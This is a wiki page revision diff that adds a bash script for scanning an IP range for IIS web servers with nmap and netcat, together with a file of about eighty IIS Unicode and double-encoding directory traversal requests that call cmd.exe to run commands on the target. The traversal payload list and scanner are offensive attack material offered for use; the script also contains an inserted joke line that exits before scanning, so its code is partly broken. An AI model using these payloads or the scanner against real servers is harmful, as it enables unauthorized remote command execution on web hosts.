This shows you the differences between two versions of the page.
bash:examples:iisscan [2013/01/07 01:14] Daniel Gohlke created |
bash:examples:iisscan [2024/02/16 01:04] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
+ | ====== IISscan.sh====== | ||
+ | Simple IIS network scanner\\ | ||
+ | Requirements: | ||
+ | grep, nmap, netcat\\ | ||
+ | <file bash iisscan.sh> | ||
+ | #!/bin/bash | ||
+ | # A Simple IIS network scanner | ||
+ | # ./iisscan.sh 10.*.54.3-23 output | ||
+ | # http://code-reference.com | ||
+ | # thanks to Ge0rG | ||
+ | clear | ||
+ | if [ $# -ne 2 ] | ||
+ | then | ||
+ | echo "$0 [ip room] [outputfile]" >&2 | ||
+ | exit 0 | ||
+ | else | ||
+ | echo "Written by cd ;) " | ||
+ | echo "scan started against to $1 on port 80" | ||
+ | echo "ScR1Ptk1dDi3 Pr0t3c7 Sy5t3m v 1.o";exit 1 | ||
+ | |||
+ | nmap $1 -p 80 -sS -oG ~/$1.out | grep open | cut '-d ' -f 2 | ||
+ | cat ~/$1.out | grep open | cut '-d ' -f 2 > $2 | ||
+ | fi | ||
+ | rm ~/$1.out | ||
+ | sum=0 | ||
+ | g=`cat $2 | wc -c` | ||
+ | sum=`expr $sum + $g` | ||
+ | if [ $sum = 0 ] | ||
+ | then | ||
+ | echo "no matches !!!" | ||
+ | rm $2 | ||
+ | exit 1 | ||
+ | fi | ||
+ | |||
+ | echo "Please wait testing server versions" | ||
+ | while read host ; | ||
+ | do | ||
+ | netcat -w 5 $host 80 < test.cmd | grep "^Server: " | sed "s/^Server:/$host/" | grep "IIS" >>hosts.$1.tmp | ||
+ | done < $2 | ||
+ | sum=0 | ||
+ | g=`cat hosts.$1.tmp | wc -c` | ||
+ | sum=`expr $sum + $g` | ||
+ | if [ $sum = 0 ] | ||
+ | then | ||
+ | echo "no matches !!! of IIS Server" | ||
+ | rm hosts.$1.tmp | ||
+ | exit 1 | ||
+ | fi | ||
+ | rm $2 | ||
+ | cat hosts.$1.tmp | cut '-d ' -f 1 > $2 | ||
+ | rm hosts.$1.tmp | ||
+ | echo "Thanks for use ... " | ||
+ | </file> | ||
+ | |||
+ | <file cmd test.cmd> | ||
+ | HEAD / HTTP/1.0 | ||
+ | </file> | ||
+ | |||
+ | <file txt unicodes.txt> | ||
+ | GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ | ||
+ | GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /MSADC/root.exe?/c+dir | ||
+ | GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /c/winnt/system32/cmd.exe?/c+dir | ||
+ | GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /d/winnt/system32/cmd.exe?/c+dir | ||
+ | GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir | ||
+ | GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c0%af../winnt/system32/cmd.exe.sh?/c+dir | ||
+ | GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/root.exe?/c+dir | ||
+ | GET /msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | |||
+ | </file> |